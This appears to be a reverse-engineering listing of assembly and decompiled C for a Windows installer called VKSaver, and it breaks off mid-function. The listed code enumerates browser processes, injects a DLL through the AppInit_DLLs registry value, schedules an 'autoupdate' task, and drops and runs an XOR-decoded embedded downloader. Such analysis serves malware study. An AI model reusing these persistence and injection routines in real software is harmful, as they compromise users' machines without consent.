jnz .12
mov eax, 0x40
.8:
test edi, edi
jz .9
mov ecx, [ebp-0x228]
mov [edi], ecx
add edi, 0x04
.9:
test esi, esi
jz .10
mov [esi], al
inc esi
.10:
test ebx, ebx
jz .11
or [ebx], eax
.11:
inc [ebp-0x234]
.12:
lea eax, [ebp-0x230]
push eax
push [ebp-0x238]
call [kernel32.Process32NextW]
test eax, eax
jnz .1
.13:
push [ebp-0x238]
call [kernel32.CloseHandle]
mov ecx, [ebp-0x04]
mov eax, [ebp-0x234]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_406beb()
mov esp, ebp
pop ebp
ret
}
/* DISPLAY WARNING: Type casts are NOT being printed */
void __fastcall sub_401740(undefined4 *param_1,undefined *param_2,uint32_t *param_3)
{
undefined4 uVar1;
int32_t iVar2;
uint32_t uVar3;
undefined4 uStack_234;
undefined auStack_230 [4];
undefined4 uStack_22c;
undefined auStack_210 [520];
uint32_t uStack_8;
uStack_8 = [0x0x46f000#SecurityCookie] ^ &stack0xfffffffc;
uVar1 = (*kernel32.CreateToolhelp32Snapshot)(2, 0);
_memset(auStack_230, 0, 0x228);
uStack_234 = 0x22c;
iVar2 = (*kernel32.Process32FirstW)(uVar1, &uStack_234);
do {
if (iVar2 == 0) {
(*kernel32.CloseHandle)(uVar1);
sub_406beb();
return;
}
iVar2 = sub_406ed0(auStack_210, "iexplore.exe");
if (iVar2 == 0) {
uVar3 = 1;
code_r0x0040188f:
if (param_1 != 0x0) {
*param_1 = uStack_22c;
param_1 = param_1 + 1;
}
if (param_2 != 0x0) {
*param_2 = uVar3;
param_2 = param_2 + 1;
}
if (param_3 != 0x0) {
*param_3 = *param_3 | uVar3;
}
}
else {
iVar2 = sub_406ed0(auStack_210, "firefox.exe");
if (iVar2 == 0) {
uVar3 = 2;
goto code_r0x0040188f;
}
iVar2 = sub_406ed0(auStack_210, "opera.exe");
if (iVar2 == 0) {
uVar3 = 4;
goto code_r0x0040188f;
}
iVar2 = sub_406ed0(auStack_210, "chrome.exe");
if (iVar2 == 0) {
uVar3 = 8;
goto code_r0x0040188f;
}
iVar2 = sub_406ed0(auStack_210, "safari.exe");
if (iVar2 == 0) {
uVar3 = 0x10;
goto code_r0x0040188f;
}
iVar2 = sub_406ed0(auStack_210, "browser.exe");
if (iVar2 == 0) {
uVar3 = 0x20;
goto code_r0x0040188f;
}
iVar2 = sub_406ed0(auStack_210, "maxthon.exe");
if (iVar2 == 0) {
uVar3 = 0x40;
goto code_r0x0040188f;
}
}
iVar2 = (*kernel32.Process32NextW)(uVar1, &uStack_234);
} while( true );
}
0x402360 sub_402360 str 7 api 3 imm 12 Unknown
sub_402360() {
push ebp
mov ebp, esp
sub esp, 0xA10
mov eax, [0x46F000]
xor eax, ebp
mov [ebp-0x04], eax
lea eax, [ebp-0xA08]
push eax
push 0x03
push 0x00
push "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows"
push 0x80000002
call [advapi32.RegOpenKeyExW]
test eax, eax
jz .1
xor al, al
mov ecx, [ebp-0x04]
xor ecx, ebp
call sub_406beb()
mov esp, ebp
pop ebp
ret
.1:
push ebx
push esi
push 0x400
lea eax, [ebp-0xA04]
push 0x00
push eax
mov dword ptr [ebp-0xA0C], 0x400
call _memset()
push 0x400
lea eax, [ebp-0x404]
push 0x00
push eax
call _memset()
mov ebx, [advapi32.RegQueryValueExW]
add esp, 0x18
lea eax, [ebp-0xA0C]
push eax
lea eax, [ebp-0xA04]
push eax
push 0x00
push 0x00
push "AppInit_DLLs"
push [ebp-0xA08]
call ebx
cmp word ptr [ebp-0xA04], 0x00
jz .7
push edi
lea edi, [ebp-0xA04]
.2:
lea eax, [ebp-0x604]
push eax
mov ecx, edi
call sub_4022c0()
cmp word ptr [ebp-0x604], 0x00
mov edi, eax
lea esi, [ebp-0x604]
jz .4
.3:
push 0x07
push "vksaver"
push esi
call __wcsnicmp()
add esp, 0x0C
test eax, eax
jz .6
add esi, 0x02
cmp word ptr [esi], 0x00
jnz .3
.4:
cmp word ptr [ebp-0x404], 0x00
jz .5
push 0x46B250
lea eax, [ebp-0x404]
push 0x200
push eax
call _wcscat_s()
add esp, 0x0C
.5:
lea eax, [ebp-0x604]
push eax
lea eax, [ebp-0x404]
push 0x200
push eax
call _wcscat_s()
add esp, 0x0C
.6:
test edi, edi
jnz .2
pop edi
.7:
cmp word ptr [ebp-0x404], 0x00
jz .8
push 0x46B250
lea eax, [ebp-0x404]
push 0x200
push eax
call _wcscat_s()
add esp, 0x0C
.8:
push 0x4B1C10
lea eax, [ebp-0x404]
push 0x200
push eax
call _wcscat_s()
lea ecx, [ebp-0x404]
add esp, 0x0C
lea edx, [ecx+0x02]
.9:
mov ax, [ecx]
add ecx, 0x02
test ax, ax
jnz .9
mov esi, [advapi32.RegSetValueExW]
sub ecx, edx
sar ecx, 0x01
lea eax, [ecx*2+0x02]
push eax
mov [ebp-0xA0C], eax
lea eax, [ebp-0x404]
push eax
push 0x01
push 0x00
push "AppInit_DLLs"
push [ebp-0xA08]
call esi
test eax, eax
jz .10
push [ebp-0xA08]
call [advapi32.RegCloseKey]
pop esi
mov al, 0x01
pop ebx
mov ecx, [ebp-0x04]
xor ecx, ebp
call sub_406beb()
mov esp, ebp
pop ebp
ret
.10:
lea eax, [ebp-0xA0C]
push eax
lea eax, [ebp-0xA10]
push eax
push 0x00
push 0x00
push "LoadAppInit_DLLs"
push [ebp-0xA08]
mov dword ptr [ebp-0xA10], 0x00
mov dword ptr [ebp-0xA0C], 0x04
call ebx
cmp dword ptr [ebp-0xA10], 0x00
jnz .11
push 0x04
lea eax, [ebp-0xA10]
push eax
push 0x04
push 0x00
push "LoadAppInit_DLLs"
push [ebp-0xA08]
mov dword ptr [ebp-0xA10], 0x01
call esi
.11:
lea eax, [ebp-0xA0C]
push eax
lea eax, [ebp-0xA04]
push eax
push 0x00
push 0x00
push "AppInit_DLLs"
push [ebp-0xA08]
call ebx
push [ebp-0xA08]
call [advapi32.RegCloseKey]
lea ecx, [ebp-0xA04]
call sub_402280()
mov ecx, [ebp-0x04]
pop esi
xor ecx, ebp
mov al, 0x01
pop ebx
call sub_406beb()
mov esp, ebp
pop ebp
ret
}
/* DISPLAY WARNING: Type casts are NOT being printed */
void sub_402360(void)
{
int16_t iVar1;
code *pcVar2;
code *pcVar3;
int32_t iVar4;
int32_t iVar5;
int16_t *piVar6;
int32_t iStack_a14;
int32_t iStack_a10;
undefined4 uStack_a0c;
int16_t aiStack_a08 [512];
int16_t iStack_608;
int16_t aiStack_606 [255];
int16_t iStack_408;
undefined auStack_406 [1022];
uint32_t uStack_8;
uStack_8 = [0x0x46f000#SecurityCookie] ^ &stack0xfffffffc;
iVar4 = (*advapi32.RegOpenKeyExW)(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows", 0, 3, &uStack_a0c);
if (iVar4 != 0) {
sub_406beb();
return;
}
iStack_a10 = 0x400;
_memset(aiStack_a08, 0, 0x400);
_memset(&iStack_408, 0, 0x400);
pcVar2 = advapi32.RegQueryValueExW;
(*advapi32.RegQueryValueExW)(uStack_a0c, "AppInit_DLLs", 0, 0, aiStack_a08, &iStack_a10);
if (aiStack_a08[0] != 0) {
do {
iVar4 = sub_4022c0(&iStack_608);
piVar6 = &iStack_608;
iVar1 = iStack_608;
while (iVar1 != 0) {
iVar5 = __wcsnicmp(piVar6, "vksaver", 7);
if (iVar5 == 0) goto code_r0x0040248c;
piVar6 = piVar6 + 1;
iVar1 = *piVar6;
}
if (iStack_408 != 0) {
_wcscat_s(&iStack_408, 0x200, 0x46b250);
}
_wcscat_s(&iStack_408, 0x200, &iStack_608);
code_r0x0040248c:
} while (iVar4 != 0);
}
if (iStack_408 != 0) {
_wcscat_s(&iStack_408, 0x200, 0x46b250);
}
_wcscat_s(&iStack_408, 0x200, 0x4b1c10);
pcVar3 = advapi32.RegSetValueExW;
piVar6 = &iStack_408;
do {
iVar1 = *piVar6;
piVar6 = piVar6 + 1;
} while (iVar1 != 0);
iStack_a10 = (piVar6 - auStack_406 >> 1) * 2 + 2;
iVar4 = (*advapi32.RegSetValueExW)(uStack_a0c, "AppInit_DLLs", 0, 1, &iStack_408, iStack_a10);
if (iVar4 != 0) {
(*advapi32.RegCloseKey)(uStack_a0c);
sub_406beb();
return;
}
iStack_a14 = 0;
iStack_a10 = 4;
(*pcVar2)(uStack_a0c, "LoadAppInit_DLLs", 0, 0, &iStack_a14, &iStack_a10);
if (iStack_a14 == 0) {
iStack_a14 = 1;
(*pcVar3)(uStack_a0c, "LoadAppInit_DLLs", 0, 4, &iStack_a14, 4);
}
(*pcVar2)(uStack_a0c, "AppInit_DLLs", 0, 0, aiStack_a08, &iStack_a10);
(*advapi32.RegCloseKey)(uStack_a0c);
sub_402280();
sub_406beb();
return;
}
0x401960 sub_401960 str 4 api 3 imm 9 Unknown
sub_401960() {
push ebp
mov ebp, esp
sub esp, 0x9C
mov eax, [0x46F000]
xor eax, ebp
mov [ebp-0x04], eax
push ebx
push 0x00
push 0x00
mov bl, cl
mov dword ptr [ebp-0x8C], 0x00
mov dword ptr [ebp-0x88], 0x00
mov dword ptr [ebp-0x94], 0x00
mov dword ptr [ebp-0x90], 0x00
call [ole32.CoInitializeEx]
movq xmm0, qword ptr [0x46AD38]
movq [ebp-0x14], xmm0
movq xmm0, qword ptr [0x46AD40]
movq [ebp-0x0C], xmm0
movq xmm0, qword ptr [0x46AD28]
movq [ebp-0x24], xmm0
movq xmm0, qword ptr [0x46AD30]
movq [ebp-0x1C], xmm0
movq xmm0, qword ptr [0x46AD68]
movq [ebp-0x44], xmm0
movq xmm0, qword ptr [0x46AD70]
movq [ebp-0x3C], xmm0
movq xmm0, qword ptr [0x46AD58]
lea eax, [ebp-0x8C]
push eax
movq [ebp-0x54], xmm0
movq xmm0, qword ptr [0x46AD60]
lea eax, [ebp-0x14]
push eax
movq [ebp-0x4C], xmm0
movq xmm0, qword ptr [IPersistFile]
push 0x01
movq [ebp-0x34], xmm0
movq xmm0, qword ptr [0x46AD50]
push 0x00
lea eax, [ebp-0x24]
push eax
movq [ebp-0x2C], xmm0
call [ole32.CoCreateInstance]
mov ecx, [ebp-0x8C]
test ecx, ecx
jnz .2
.1:
xor al, al
pop ebx
mov ecx, [ebp-0x04]
xor ecx, ebp
call sub_406beb()
mov esp, ebp
pop ebp
ret
.2:
mov eax, [ecx]
push "VKSaver"
push ecx
call [eax+0x1C]
mov eax, [ebp-0x8C]
push "VKSaverUpdate"
mov ecx, [eax]
push eax
call [ecx+0x1C]
mov eax, [ebp-0x8C]
lea edx, [ebp-0x88]
mov ecx, [eax]
push edx
lea edx, [ebp-0x44]
push edx
lea edx, [ebp-0x54]
push edx
push "VKSaverUpdate"
push eax
call [ecx+0x20]
mov ecx, [ebp-0x88]
test ecx, ecx
jz .1
mov eax, [ecx]
lea edx, [ebp-0x90]
push edx
lea edx, [ebp-0x98]
push edx
push ecx
call [eax+0x0C]
push 0x30
lea eax, [ebp-0x84]
push 0x00
push eax
call _memset()
mov eax, 0x30
mov [ebp-0x84], ax
mov eax, 0x01
add esp, 0x0C
mov [ebp-0x7C], ax
mov eax, [ebp-0x90]
lea edx, [ebp-0x84]
mov dword ptr [ebp-0x80], 0x107D0
mov dword ptr [ebp-0x70], 0xFFFF
mov dword ptr [ebp-0x64], 0x06
mov ecx, [eax]
push edx
push eax
call [ecx+0x0C]
mov eax, [ebp-0x88]
push 0x4B1A10
mov ecx, [eax]
push eax
call [ecx+0x80]
mov eax, [ebp-0x88]
push 0x00
mov ecx, [eax]
push 0x46B100
push eax
call [ecx+0x78]
mov eax, [ebp-0x88]
push "-autoupdate"
mov ecx, [eax]
push eax
call [ecx+0x88]
mov eax, [ebp-0x88]
lea edx, [ebp-0x94]
mov ecx, [eax]
push edx
lea edx, [ebp-0x34]
push edx
push eax
call [ecx]
mov ecx, [ebp-0x94]
test ecx, ecx
jz .1
mov eax, [ecx]
push 0x01
push 0x00
push ecx
call [eax+0x18]
mov eax, [ebp-0x94]
push eax
mov ecx, [eax]
call [ecx+0x08]
test bl, bl
jz .4
mov eax, [ebp-0x88]
push eax
mov ecx, [eax]
call [ecx+0x30]
.4:
mov eax, [ebp-0x88]
push eax
mov ecx, [eax]
call [ecx+0x08]
mov eax, [ebp-0x90]
push eax
mov ecx, [eax]
call [ecx+0x08]
mov eax, [ebp-0x8C]
push eax
mov ecx, [eax]
call [ecx+0x08]
call [ole32.CoUninitialize]
mov ecx, [ebp-0x04]
xor ecx, ebp
mov al, 0x01
pop ebx
call sub_406beb()
mov esp, ebp
pop ebp
ret
}
/* WARNING: Globals starting with '_' overlap smaller symbols at the same address */
/* DISPLAY WARNING: Type casts are NOT being printed */
void __fastcall sub_401960(char param_1)
{
undefined auStack_9c [4];
int32_t *piStack_98;
int32_t *piStack_94;
int32_t *piStack_90;
int32_t *piStack_8c;
undefined2 auStack_88 [2];
undefined4 uStack_84;
undefined2 uStack_80;
undefined4 uStack_74;
undefined4 uStack_68;
undefined8 uStack_58;
undefined8 uStack_50;
undefined8 uStack_48;
undefined8 uStack_40;
undefined8 uStack_38;
undefined8 uStack_30;
undefined8 uStack_28;
undefined8 uStack_20;
undefined8 uStack_18;
undefined8 uStack_10;
uint32_t uStack_8;
uStack_8 = [0x0x46f000#SecurityCookie] ^ &stack0xfffffffc;
piStack_90 = 0x0;
piStack_8c = 0x0;
piStack_98 = 0x0;
piStack_94 = 0x0;
(*ole32.CoInitializeEx)(0, 0);
uStack_18 = [0x0x46ad38];
uStack_10 = [0x0x46ad40];
uStack_28 = [0x0x46ad28];
uStack_20 = [0x0x46ad30];
uStack_48 = [0x0x46ad68];
uStack_40 = [0x0x46ad70];
uStack_58 = [0x0x46ad58];
uStack_50 = [0x0x46ad60];
uStack_38 = IPersistFile;
uStack_30 = [0x0x46ad50];
(*ole32.CoCreateInstance)(&uStack_28, 0, 1, &uStack_18, &piStack_90);
if (piStack_90 != 0x0) {
(**(*piStack_90 + 0x1c))(piStack_90, "VKSaver");
(**(*piStack_90 + 0x1c))(piStack_90, "VKSaverUpdate");
(**(*piStack_90 + 0x20))(piStack_90, "VKSaverUpdate", &uStack_58, &uStack_48, &piStack_8c);
if (piStack_8c != 0x0) {
(**(*piStack_8c + 0xc))(piStack_8c, auStack_9c, &piStack_94);
_memset(auStack_88, 0, 0x30);
auStack_88[0] = 0x30;
uStack_80 = 1;
uStack_84 = 0x107d0;
uStack_74 = 0xffff;
uStack_68 = 6;
(**(*piStack_94 + 0xc))(piStack_94, auStack_88);
(**(*piStack_8c + 0x80))(piStack_8c, 0x4b1a10);
(**(*piStack_8c + 0x78))(piStack_8c, 0x46b100, 0);
(**(*piStack_8c + 0x88))(piStack_8c, "-autoupdate");
(***piStack_8c)(piStack_8c, &uStack_38, &piStack_98);
if (piStack_98 != 0x0) {
(**(*piStack_98 + 0x18))(piStack_98, 0, 1);
(**(*piStack_98 + 8))(piStack_98);
if (param_1 != '\0') {
(**(*piStack_8c + 0x30))(piStack_8c);
}
(**(*piStack_8c + 8))(piStack_8c);
(**(*piStack_94 + 8))(piStack_94);
(**(*piStack_90 + 8))(piStack_90);
(*ole32.CoUninitialize)();
sub_406beb();
return;
}
}
}
sub_406beb();
return;
}
0x404A80 sub_404a80 str 3 api 16 imm 30 Unknown
sub_404a80() {
push ebp
mov ebp, esp
and esp, 0xFFFFFFF0
mov eax, 0x1078
call __alloca_probe()
mov eax, [0x46F000]
xor eax, esp
mov [esp+0x1074], eax
push esi
push edi
push 0x44
lea eax, [esp+0x34]
xorps xmm0, xmm0
push 0x00
push eax
movdqa [esp+0x1C], xmm0
call _memset()
add esp, 0x0C
cmp word ptr [0x4B1048], 0x00
jz .9
lea eax, [esp+0x78]
push eax
push 0x200
call [kernel32.GetTempPathW]
lea ecx, [esp+0x78]
lea edx, [ecx+0x02]
nop
.1:
mov ax, [ecx]
add ecx, 0x02
test ax, ax
jnz .1
sub ecx, edx
sar ecx, 0x01
lea esi, [esp+0x78]
cmp word ptr [esi+ecx*2-0x02], 0x5C
lea esi, [esi+ecx*2]
jz .2
mov eax, 0x5C
mov [esi], ax
add esi, 0x02
.2:
lea eax, [esp+0x28]
push eax
call [kernel32.GetSystemTimeAsFileTime]
call [kernel32.GetCurrentProcessId]
rol eax, 0x18
xor eax, [esp+0x2C]
push eax
call [kernel32.GetTickCount]
xor eax, [esp+0x2C]
push eax
push "%x%x"
push esi
call [user32.wsprintfW]
add esp, 0x10
xor ecx, ecx
mov edi, edi
.3:
movzx eax, word ptr [esp+ecx*1+0x78]
mov [esp+ecx*1+0x478], ax
lea ecx, [ecx+0x02]
test ax, ax
jnz .3
push 0x00
lea eax, [esp+0x47C]
push eax
call [kernel32.CreateDirectoryW]
lea edi, [esp+0x78]
add edi, 0xFFFFFFFE
lea esp, [esp]
.4:
mov ax, [edi+0x02]
add edi, 0x02
test ax, ax
jnz .4
push 0x23984
mov ecx, 0x08
mov esi, "\\downloader.exe"
push 0x01
rep movsd
call _calloc()
mov esi, eax
add esp, 0x08
mov [esp+0x0C], esi
test esi, esi
jz .6
mov eax, esi
mov edx, 0x4146B0
sub eax, edx
mov ecx, 0x75BCD15
mov [esp+0x08], eax
mov edi, 0x8E60
mov esi, eax
lea ebx, [ebx]
.5:
mov eax, [edx]
xor eax, ecx
rol ecx, 0x0D
mov [esi+edx*1], eax
lea edx, [edx+0x04]
dec edi
jnz .5
mov esi, [esp+0x0C]
.6:
push 0x23980
mov edx, esi
lea ecx, [esp+0x7C]
mov dword ptr [esp+0x0C], 0x23980
call sub_401650()
add esp, 0x04
cmp al, 0x01
jz .7
lea ecx, [esp+0x78]
call sub_401510()
test al, al
jz .8
push 0x00
push 0x00
push 0x02
push 0x00
push 0x01
push 0x40000000
lea eax, [esp+0x90]
push eax
call [kernel32.CreateFileW]
mov edi, eax
cmp edi, 0xFFFFFFFF
jz .8
push 0x00
lea eax, [esp+0x0C]
push eax
push [esp+0x10]
push esi
push edi
call [kernel32.WriteFile]
push edi
call [kernel32.CloseHandle]
.7:
xor eax, eax
mov [esp+0x60], ax
push 0x4B1048
lea eax, [esp+0x7C]
push eax
lea eax, [esp+0x880]
push "\"%s\" %s"
push eax
mov dword ptr [esp+0x40], 0x44
mov dword ptr [esp+0x6C], 0x01
call [user32.wsprintfW]
add esp, 0x10
lea eax, [esp+0x10]
push eax
lea eax, [esp+0x34]
push eax
lea eax, [esp+0x480]
push eax
push 0x00
push 0x8000000
push 0x00
push 0x00
push 0x00
lea eax, [esp+0x898]
push eax
push 0x00
call [kernel32.CreateProcessW]
.8:
push esi
call _free()
add esp, 0x04
.9:
mov dl, 0x01
mov cl, dl
call sub_402ce0()
mov esi, [esp+0x10]
cmp esi, 0xFFFFFFFF
jz .15
test esi, esi
jz .15
push 0xEA60
push esi
mov byte ptr [0x4B14B8], 0x01
call [kernel32.WaitForSingleObject]
mov edi, [kernel32.Sleep]
test eax, eax
jz .10
push 0x01
push [0x4B1480]
call [user32.EnableWindow]
push 0x493E0
push esi
call [kernel32.WaitForSingleObject]
test eax, eax
jnz .12
.10:
mov ecx, [esp+0x18]
call sub_404910()
test al, al
jz .12
mov byte ptr [0x4B14B8], 0x02
xor esi, esi
.11:
push 0x3E8
call edi
mov ecx, [esp+0x18]
call sub_404910()
test al, al
jz .12
inc esi
cmp esi, 0xF0
jl .11
.12:
cmp byte ptr [0x4B14B9], 0x00
jz .14
mov byte ptr [0x4B14B8], 0x03
xor esi, esi
.13:
push 0x3E8
call edi
; listing truncated
/* WARNING: Removing unreachable block (ram,0x00404cd3) */
/* WARNING: Removing unreachable block (ram,0x00404cf0) */
/* WARNING: Removing unreachable block (ram,0x00404d0e) */
/* WARNING: Removing unreachable block (ram,0x00404d1b) */
/* WARNING: Removing unreachable block (ram,0x00404d24) */
/* WARNING: Removing unreachable block (ram,0x00404d38) */
/* WARNING: Removing unreachable block (ram,0x00404d41) */
/* WARNING: Removing unreachable block (ram,0x00404d4a) */
/* WARNING: Removing unreachable block (ram,0x00404d53) */
/* WARNING: Removing unreachable block (ram,0x00404d63) */
/* WARNING: Removing unreachable block (ram,0x00404d6c) */
/* DISPLAY WARNING: Type casts are NOT being printed */
void sub_404a80(void)
{
int16_t iVar1;
char cVar2;
uint32_t uVar3;
int16_t *piVar4;
int32_t iVar5;
uint32_t uVar6;
uint32_t *puVar7;
undefined4 *puVar8;
undefined4 *puVar9;
int32_t iVar10;
__alloca_probe();
_memset();
if ([0x0x4b1048] == 0) goto code_r0x00404cb5;
(*kernel32.GetTempPathW)();
piVar4 = &stack0x00000058;
do {
iVar1 = *piVar4;
piVar4 = piVar4 + 1;
} while (iVar1 != 0);
iVar5 = piVar4 - &stack0x0000005a >> 1;
if (*(&stack0x00000056 + iVar5 * 2) != 0x5c) {
*(&stack0x00000058 + iVar5 * 2) = 0x5c;
}
(*kernel32.GetSystemTimeAsFileTime)();
(*kernel32.GetCurrentProcessId)();
(*kernel32.GetTickCount)();
(*user32.wsprintfW)();
iVar5 = 0;
do {
piVar4 = &stack0x00000054 + iVar5;
*(&stack0x00000454 + iVar5) = *piVar4;
iVar5 = iVar5 + 2;
} while (*piVar4 != 0);
(*kernel32.CreateDirectoryW)();
puVar9 = &stack0x0000004a;
do {
piVar4 = puVar9 + 2;
puVar9 = puVar9 + 2;
} while (*piVar4 != 0);
puVar8 = "\\downloader.exe";
for (iVar5 = 8; iVar5 != 0; iVar5 = iVar5 + -1) {
*puVar9 = *puVar8;
puVar8 = puVar8 + 1;
puVar9 = puVar9 + 1;
}
iVar5 = _calloc();
if (iVar5 != 0) {
puVar7 = 0x4146b0;
uVar6 = 0x75bcd15;
iVar10 = 0x8e60;
do {
uVar3 = *puVar7 ^ uVar6;
uVar6 = uVar6 << 0xd | uVar6 >> 0x13;
*(iVar5 + -0x4146b0 + puVar7) = uVar3;
puVar7 = puVar7 + 1;
iVar10 = iVar10 + -1;
} while (iVar10 != 0);
}
cVar2 = sub_401650();
if (cVar2 == '\x01') {
code_r0x00404c46:
(*user32.wsprintfW)();
(*kernel32.CreateProcessW)();
}
else {
cVar2 = sub_401510();
if ((cVar2 != '\0') && (iVar5 = (*kernel32.CreateFileW)(), iVar5 != -1)) {
(*kernel32.WriteFile)();
(*kernel32.CloseHandle)();
goto code_r0x00404c46;
}
}
_free();
code_r0x00404cb5:
sub_402ce0();
if ([0x0x4b1048] != 0) {
(*kernel32.DeleteFileW)();
(*kernel32.RemoveDirectoryW)();
}
[0x0x4b1044] = [0x0x4b1044] + 1;
sub_406beb();
return;
}
0x405EB0 sub_405eb0 str 3 api 14 imm 20 Unknown
sub_405eb0() {
push ebp
mov ebp, esp
sub esp, 0x6C
mov eax, [0x46F000]
xor eax, ebp
mov [ebp-0x04], eax
push ebx
push esi
push edi
push "riched20.dll"
call [kernel32.LoadLibraryW]
lea eax, [ebp-0x20]
push eax
mov dword ptr [ebp-0x20], 0x08
mov dword ptr [ebp-0x1C], 0xC0FF
call [comctl32.InitCommonControlsEx]
mov eax, [0x4B2010]
mov esi, [user32.LoadIconW]
push 0x6B
push eax
mov dword ptr [ebp-0x50], 0x30
mov dword ptr [ebp-0x4C], 0x03
mov dword ptr [ebp-0x48], sub_404dc0()
mov dword ptr [ebp-0x44], 0x00
mov dword ptr [ebp-0x40], 0x00
mov [ebp-0x3C], eax
call esi
push 0x7F00
push 0x00
mov [ebp-0x38], eax
call [user32.LoadCursorW]
push 0x6C
push [ebp-0x3C]
mov [ebp-0x34], eax
mov dword ptr [ebp-0x30], 0x10
mov dword ptr [ebp-0x2C], 0x00
mov dword ptr [ebp-0x28], "VKSaverInstallWnd"
call esi
mov [ebp-0x24], eax
lea eax, [ebp-0x50]
push eax
call [user32.RegisterClassExW]
push 0x84
push [0x4B2010]
call [user32.LoadBitmapW]
mov esi, eax
call [user32.GetDesktopWindow]
push eax
call [user32.GetDC]
mov ebx, [gdi32.CreateCompatibleDC]
push eax
mov [ebp-0x18], eax
call ebx
mov edi, [gdi32.SelectObject]
push esi
push eax
mov [0x4B14B4], eax
call edi
push 0x85
push [0x4B2010]
call [user32.LoadBitmapW]
push [ebp-0x18]
mov esi, eax
call ebx
push esi
push eax
mov [0x4B14B0], eax
call edi
push 0x87
push [0x4B2010]
call [user32.LoadBitmapW]
push [ebp-0x18]
mov esi, eax
call ebx
push esi
push eax
mov [0x4B14AC], eax
call edi
lea eax, [ebp-0x14]
push eax
call [user32.GetDesktopWindow]
push eax
call [user32.GetClientRect]
push 0x00
push [0x4B2010]
push 0x00
push 0x00
mov eax, [ebp-0x08]
cdq
sub eax, edx
push 0x190
sar eax, 0x01
push 0x1F4
sub eax, 0xC8
push eax
mov eax, [ebp-0x0C]
cdq
sub eax, edx
sar eax, 0x01
sub eax, 0xFA
push eax
push 0x80C80000
push 0x4B1510
push "VKSaverInstallWnd"
push 0x08
call [user32.CreateWindowExW]
mov esi, eax
push 0x05
push esi
call [user32.ShowWindow]
push esi
call [user32.UpdateWindow]
mov ebx, [user32.GetMessageW]
push 0x00
push 0x00
push 0x00
lea eax, [ebp-0x6C]
push eax
call ebx
test eax, eax
jz .3
mov esi, [user32.TranslateMessage]
mov edi, [user32.DispatchMessageW]
.2:
lea eax, [ebp-0x6C]
push eax
call esi
lea eax, [ebp-0x6C]
push eax
call edi
push 0x00
push 0x00
push 0x00
lea eax, [ebp-0x6C]
push eax
call ebx
test eax, eax
jnz .2
.3:
mov ecx, [ebp-0x04]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_406beb()
mov esp, ebp
pop ebp
ret
}
/* DISPLAY WARNING: Type casts are NOT being printed */
void sub_405eb0(void)
{
code *pcVar1;
code *pcVar2;
code *pcVar3;
undefined4 uVar4;
undefined4 uVar5;
int32_t iVar6;
undefined auStack_70 [28];
undefined4 uStack_54;
undefined4 uStack_50;
code *pcStack_4c;
undefined4 uStack_48;
undefined4 uStack_44;
undefined4 uStack_40;
undefined4 uStack_3c;
undefined4 uStack_38;
undefined4 uStack_34;
undefined4 uStack_30;
undefined4 uStack_2c;
undefined4 uStack_28;
undefined4 uStack_24;
undefined4 uStack_20;
undefined4 uStack_1c;
undefined auStack_18 [8];
int32_t iStack_10;
int32_t iStack_c;
uint32_t uStack_8;
uStack_8 = [0x0x46f000#SecurityCookie] ^ &stack0xfffffffc;
(*kernel32.LoadLibraryW)("riched20.dll");
uStack_24 = 8;
uStack_20 = 0xc0ff;
(*comctl32.InitCommonControlsEx)(&uStack_24);
pcVar1 = user32.LoadIconW;
uStack_54 = 0x30;
uStack_50 = 3;
pcStack_4c = sub_404dc0;
uStack_48 = 0;
uStack_44 = 0;
uStack_40 = [0x0x4b2010];
uStack_3c = (*user32.LoadIconW)([0x0x4b2010], 0x6b);
uStack_38 = (*user32.LoadCursorW)(0, 0x7f00);
uStack_34 = 0x10;
uStack_30 = 0;
uStack_2c = "VKSaverInstallWnd";
uStack_28 = (*pcVar1)(uStack_40, 0x6c);
(*user32.RegisterClassExW)(&uStack_54);
uVar4 = (*user32.LoadBitmapW)([0x0x4b2010], 0x84);
uVar5 = (*user32.GetDesktopWindow)();
uStack_1c = (*user32.GetDC)(uVar5);
pcVar2 = gdi32.CreateCompatibleDC;
004b14b4 = (*gdi32.CreateCompatibleDC)(uStack_1c);
pcVar1 = gdi32.SelectObject;
(*gdi32.SelectObject)(004b14b4, uVar4);
uVar4 = (*user32.LoadBitmapW)([0x0x4b2010], 0x85);
004b14b0 = (*pcVar2)(uStack_1c);
(*pcVar1)(004b14b0, uVar4);
uVar4 = (*user32.LoadBitmapW)([0x0x4b2010], 0x87);
004b14ac = (*pcVar2)(uStack_1c);
(*pcVar1)(004b14ac, uVar4);
uVar4 = (*user32.GetDesktopWindow)(auStack_18);
(*user32.GetClientRect)(uVar4);
uVar4 = (*user32.CreateWindowExW)
(8, "VKSaverInstallWnd", 0x4b1510, 0x80c80000, iStack_10 / 2 + -0xfa, iStack_c / 2 + -200, 500, 400, 0, 0,
[0x0x4b2010], 0);
(*user32.ShowWindow)(uVar4, 5);
(*user32.UpdateWindow)(uVar4);
pcVar3 = user32.GetMessageW;
iVar6 = (*user32.GetMessageW)(auStack_70, 0, 0, 0);
pcVar2 = user32.TranslateMessage;
pcVar1 = user32.DispatchMessageW;
while (iVar6 != 0) {
(*pcVar2)(auStack_70);
(*pcVar1)(auStack_70);
iVar6 = (*pcVar3)(auStack_70, 0, 0, 0);
}
sub_406beb();
return;
}
0x4010B0 sub_4010b0 str 3 api 9 imm 11 Unknown
sub_4010b0() {
push ebp
mov ebp, esp
sub esp, 0x880
mov eax, [0x46F000]
xor eax, ebp
mov [ebp-0x04], eax
push esi
push edi
lea eax, [ebp-0x620]
push eax
push 0x00
push 0x00
push 0x1A
push 0x00
call [shell32.SHGetFolderPathW]
lea eax, [ebp-0x620]
push eax
lea eax, [ebp-0x210]
push "%s\\Opera\\Opera\\operaprefs.ini"
push eax
call [user32.wsprintfW]
add esp, 0x0C
lea eax, [ebp-0x870]
push eax
lea eax, [ebp-0x210]
push eax
call [kernel32.FindFirstFileW]
cmp eax, 0xFFFFFFFF
jz .5
push eax
call [kernel32.FindClose]
lea eax, [ebp-0x874]
push eax
push 0x20019
push 0x00
push "Software\\Opera Software"
push 0x80000001
mov dword ptr [ebp-0x874], 0x00
call [advapi32.RegOpenKeyExW]
mov eax, [ebp-0x874]
test eax, eax
jz .5
lea ecx, [ebp-0x878]
push ecx
lea ecx, [ebp-0x210]
push ecx
lea ecx, [ebp-0x87C]
push ecx
push 0x00
push "Last CommandLine v2"
push eax
mov dword ptr [ebp-0x87C], 0x01
mov dword ptr [ebp-0x878], 0x104
call [advapi32.RegQueryValueExW]
